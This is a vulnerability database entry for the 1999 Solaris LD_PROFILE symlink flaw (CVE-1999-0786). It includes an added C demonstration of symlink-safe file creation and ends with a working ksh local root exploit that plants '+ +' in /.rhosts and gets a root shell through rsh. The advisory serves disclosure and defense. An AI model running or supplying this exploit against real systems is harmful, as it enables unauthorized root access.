Solaris Profile File Creation Vulnerability

Vulnerability ID: 1105548
Vulnerability type: Unknown
Published: 1999-09-22
Updated: 2005-05-02
CVE ID: CVE-1999-0786
CNNVD-ID: CNNVD-199909-039
Platform: Solaris
CVSS score: 4.6
|Vulnerability source
https://www.exploit-db.com/exploits/19509
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-039
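|Vulnerability details
The Solaris dynamic linker contains a vulnerability. A local user can create arbitrary files by means of the LD_PROFILE environment variable and a symbolic link attack.
|Vulnerability exploit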
source: http://www.securityfocus.com/bid/659/info

A vulnerability in the dynamic linkers while profiling a shared object allows local users to create arbitrary files in the system. It cannot be used to overwrite existing files.

If the LD_PROFILE environment variable is defined it instructs the dynamic linker to profile the shared object defined by it. When profiling is enabled, a profiling buffer file is created and mapped. The name of the buffer file is the name of the shared object being profiled with a .profile extension. By default this buffer is placed under /var/tmp.

The dynamic linker created the buffer file insecurely in the case where it runs in the context of a setuid application. It follows symbolic links while creating the file.

This is Sun BugID 4150646. This is the same bug as Sun BugID 1241843. The new instance was introduced after an extensive rewrite of the dynamic linker. The problem was originally fixed in Solaris 2.5.1 and back patched. It was reintroduced in 2.6 and back patched into 2.5.1. 
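
The symlink-following file creation described above, shown beside a hardened open() call. This is an added example, not part of the original advisory and not the Solaris linker's code; the function names, the scratch directory and the `victim` file are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed weak pattern (not the Solaris linker's source): O_CREAT alone
 * resolves a symlink in the last path component and creates its target. */
static int create_following_links(const char *path) {
    return open(path, O_RDWR | O_CREAT, 0600);
}

/* Hardened form: with O_EXCL, open() fails with EEXIST when the name already
 * exists, even as a dangling symlink; O_NOFOLLOW also refuses symlinks. */
static int create_refusing_links(const char *path) {
    return open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Builds a private scratch directory (constructed names) holding a dangling
 * symlink ps.profile -> victim, attempts the create through the link, and
 * returns 1 if "victim" came into existence, 0 if not, -1 on setup failure. */
int victim_created(int hardened) {
    char dir[] = "/tmp/ldprofile-demo-XXXXXX";
    char profile[128], victim[128];
    struct stat st;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(profile, sizeof profile, "%s/ps.profile", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, profile) != 0) { rmdir(dir); return -1; }

    int fd = hardened ? create_refusing_links(profile)
                      : create_following_links(profile);
    if (fd >= 0) close(fd);

    int created = (stat(victim, &st) == 0);
    unlink(victim);
    unlink(profile);
    rmdir(dir);
    return created;
}

int main(void) {
    printf("O_CREAT only:              victim created = %d\n", victim_created(0));
    printf("O_CREAT|O_EXCL|O_NOFOLLOW: victim created = %d\n", victim_created(1));
    return 0;
}
```

A privileged process that must write into a shared directory such as /var/tmp should use the second form, or create the file only after dropping to the real user's credentials.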

#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# [email protected] 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
|References

Source: BID
Name: 659
Link: http://www.securityfocus.com/bid/659
